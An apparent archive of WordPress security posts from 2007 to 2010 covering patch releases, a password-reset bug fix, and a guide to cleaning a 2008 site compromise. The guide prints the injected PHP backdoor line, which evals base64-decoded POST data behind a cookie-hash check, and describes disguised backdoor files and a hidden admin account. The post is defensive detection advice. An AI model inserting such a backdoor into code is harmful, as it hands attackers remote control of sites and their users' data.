Check your web host file permissions first!

November 23, 2010 | No Comments Yet

WordPress security issues come and go, and while some stay because it’s tough to get the crud out, other times it’s because site owners overlook an important part of keeping their hosts protected: file permissions.

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

Matt Mullenweg warns against web hosts and other security announcements that place the blame on the WordPress software without first checking if proper file permissions are in place.

Devlounge has an old but still applicable article on protecting your wp-config.php files, for starters. This article on WP Tavern also tackles the issue above and shares more file permission advice especially on shared hosting accounts.

Leave a Comment | Tags: , , , , , , , , , ,

Tips on keeping your WordPress blog secure

July 22, 2010 | No Comments Yet

Make Tech Easier shares 11 tips on keeping malicious parties from penetrating your WordPress-powered blog. Here’s a snippet:

7) Change your login name

The default username is admin. You can make it more difficult for the hacker to crack your login credential by changing the login name.

You can never be too careful about these things, so be sure to follow the tips mentioned in the article.

(Via)

Leave a Comment | Tags: , , , ,

WordPress 2.8.4

August 12, 2009 | No Comments Yet

As expected, Automattic promptly released WordPress 2.8.4, a security update to the previously mentioned remote admin password reset vulnerability.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

Whether you’ve patched your WP installation as instructed or not, better grab this upgrade immediately. As always, backup before doing so!

Leave a Comment | Tags: , , , , , , , , ,

Remote admin password reset vulnerability issue in WP 2.8.3 and below

August 12, 2009 | 2 Comments

WordPress 2.8.3. just came out but even this doesn’t seem enough to stop this newly discovered security issue, which resets your administrator password remotely. This was reported by Laurent Gaffié in the Neohapsis mailing list a couple of days ago.

The software vulnerability has been submitted to the WordPress trac, and according to them there’s a one-liner fix: in wp-login.php, change line 190 from

if ( empty( $key ) )

to

if ( empty( $key ) || is_array( $key ) )

Sucuri Security, however, still argues that “they are still using blacklists instead of a whilelist of what should be accepted”.

Expect another security update to your WordPress install very soon. In the meantime, prepare to backup your database and files again!

Leave a Comment | Tags: , , , , ,

WordPress 2.8.2

July 20, 2009 | No Comments Yet

WordPress 2.8.2 is an important security update that addresses an XSS vulnerability with unsanitized comment author URLs. No betas or release candidates came out before this version, but upgrade away! The notice should already be up in your WordPress admin panel.

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.6.3

October 24, 2008 | No Comments Yet

WordPress 2.6.3 provides a security fix for a vulnerability found in the Snoopy library, which according to the project page is a “PHP class that simulates a web browser”.

Since this is a security upgrade, it’s best that you download the latest version immediately. But since only 2 files were updated, i.e. wp-includes/class-snoopy.php and wp-includes/version.php, you can also just grab those and replace the ones on your server.

Leave a Comment | Tags: , , , , , , , ,

WordPress Plugin: WordPress Exploit Scanner

June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner

Leave a Comment | Tags: , , , , , , ,

More WordPress blogs being hacked

June 18, 2008 | No Comments Yet

Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.

The recent security issues concern hackers who work with Google and other search engine results and redirects traffic from your blog or website. The searchers clicks on the link and is redirected to the hacker’s site with the same search string used to search in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.

Read Lorelle’s post for more information on detecting and eliminating this security issue.

Leave a Comment | Tags: , , , , , ,

Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

When it comes to security, there are a lot of possible culprits but in this particular situation, we can only be thankful there are a lot of indicative factors and fairly easy ways to resolve the problem. I cannot emphasize how important it is to upgrade immediately. Is it better to have non-working themes and plugins than an insecure site? I would think not.

However, one has to wonder how upgrading to WordPress 2.5 can fix the problem. Remember that when upgrading you are advised to delete the old files first then upload the new files. If you just upload and overwrite the old files, the new files such as the _new, _old, .pngg, .jpgg, .giff ones will remain on the server. Removing them one by one by going through each folder on your website will definitely be painful!

Also take a look at your file and folder permissions. We usually have to CHMOD our uploads, themes, and plugins folders so that we can edit them in the administration panel, but they also make for a hacker’s point of entry.

I believe the most crucial problem here are the wp-info.txt files. The other penetrations could have been used for adding spam comments and links only, but having access to people’s passwords is far worse, especially when it includes your own readers.

Update (April 17): There’s now a WordPress Codex page for this issue.

Update (May 2): Please continue to visit the WordPress Support forum for any new developments on this hack. There are other symptoms popping up, like unwanted plugins activated in the database (see active_plugins and deactivated_plugins under wp_options).

Update (June 10): Check out this very helpful post by Donncha O Caoimh.

Leave a Comment | Tags: , , , , , , ,

Technorati’s Ultimatum: Upgrade WordPress to 2.5 Now or Your Blog Will NOT Be Indexed

April 8, 2008 | 7 Comments

Now this comes as a surprise. Technorati has actually given an ultimatum to vulnerable WordPress blogs, saying that unless they upgrade to the latest, most secure version, 2.5, they will not be indexed.

Blogs that have been compromised by this security vulnerability are typified by having links to spam destinations inserted onto the blog page. These link insertions may be invisible to casual observations; the links are often obscured by style attributes that render them invisible. These links are still seen by crawlers such as Technorati’s, Google’s and Yahoo’s.

Technorati also mentions that blogs hosted on WordPress.com should not have this vulnerability.

I know Filipino bloggers are big fans of Technorati, so here’s yet another reason for you to upgrade to WordPress 2.5. Don’t worry, it’s not scary at all!

Leave a Comment | Tags: , , , , , ,

Update to WordPress 2.3.3 Now!

February 5, 2008 | 1 Comment

Two months after the last upgrade, WordPress 2.3.3 is an urgent security release. It addresses an XML-RPC vulnerability that allows any user to edit any other user’s posts in the same blog, as well as some other bug fixes.

Now if updating seems too much of a chore right now and you only care about keeping your blog secure, get the updated xmlrpc.php file and you’re good to go.

Check out the whole announcement at the official WordPress blog.

Leave a Comment | Tags: , , ,

WordPress 2.3.1

November 22, 2007 | No Comments Yet

The latest stable release of WordPress as of this writing is 2.3.1. Changes from the previous version were mostly security and bug fixes.

Please head on to the official WordPress site to download.

Leave a Comment | Tags: , , ,